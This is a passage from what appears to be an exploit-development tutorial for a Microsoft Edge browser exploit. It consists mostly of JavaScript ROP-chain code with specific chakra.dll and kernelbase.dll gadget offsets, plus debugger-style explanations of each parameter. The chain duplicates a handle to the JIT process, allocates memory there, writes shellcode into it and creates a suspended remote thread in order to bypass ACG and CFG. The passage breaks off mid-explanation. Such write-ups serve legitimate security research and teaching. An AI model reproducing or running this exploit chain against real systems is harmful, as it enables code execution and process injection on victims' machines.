	0x8							// 64-bit pointer size (sizeof(QWORD)))
	NULL 							// Optional
);

Our ROP chain simply will write the address of our shellcode, in the remote JIT process (allocated via VirtualAllocEx) to our “final” VirtualProtect ROP chain so that the VirtualProtect ROP chain knows what pages to mark RWX. This is achieved via ROP, as seen below (including all previous ROP chains):

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

Let’s now walk through this in the debugger. We again set a breakpoint on jmp rax until we reach our call to CreateRemoteThread. From here we can pt this function call to pause at the ret, and view our first gadgets for our new WriteProcessMemory ROP chain.

If we look at the above WriteProcessMemory ROP chain, we start off by actually preserving the value of the handle to the thread we just created in the .data section of kernelbase.dll (very similarly to what we did with preserving our VirtualAllocEx allocation). We can see this in action below (remember CreateRemoteThread’s return value is the handle value to the new thread. It is stored in RAX, so we can pull it directly from there):

After preserving the address, we begin with our first parameter - nSize. Since we are just writing a pointer value, we specify 8 bytes (while dealing with the pesky cmp r8d, [rax] instruction):

Our function call is now in the following state:

WriteProcessMemory(
	-
	-
	-
	0x8							// 64-bit pointer size (sizeof(QWORD)))
	-
);

The next parameter we will target is hProcess. This time we are not writing remotely, and we can simply use -1, or 0xFFFFFFFFFFFFFFFF. This is the value returned by GetCurrentProcess to retrieve a handle to the current process. This tells WriteProcessMemory to perform this write process within the content process, where our VirtualProtect ROP chain is and where our exploit is currently executing. We can simply just write this value to the stack and pop it into RCX.

Our call is now in the current state:

WriteProcessMemory(
	(HANDLE)0xFFFFFFFFFFFFFFFF, 				// Psuedo handle to the current process (the content process, when the exploit is executing)
	-
	-
	0x8							// 64-bit pointer size (sizeof(QWORD)))
	-
);

Next up is lpBaseAddress parameter. This is where we want WriteProcessMemory to write whatever data we want to. In this case, this is the location in the VirtualProtect ROP chain in the .data section of chakra.dll.

Our call is now in the current state:

WriteProcessMemory(
	(HANDLE)0xFFFFFFFFFFFFFFFF, 				// Psuedo handle to the current process (the content process, when the exploit is executing)
	addressof(VirtualProtectROPChain_offset),		// Address of our return value from VirtualAllocEx (where we want to write the VirtualAllocEx_allocation address to)
	-
	0x8							// 64-bit pointer size (sizeof(QWORD)))
	-
);

The next item to take care of is the lpBuffer. This memory address contains the contents we want to write to lpBaseAddress. Recall earlier that we stored our VirtualAllocEx allocation (our shellcode location in the remote process) into the .data section of kernelbase.dll. Since lpBuffer requires a pointer, we simply just need to place the .data address of our stored allocation into R8.

Our call is now in the following state:

WriteProcessMemory(
	(HANDLE)0xFFFFFFFFFFFFFFFF, 				// Psuedo handle to the current process (the content process, when the exploit is executing)
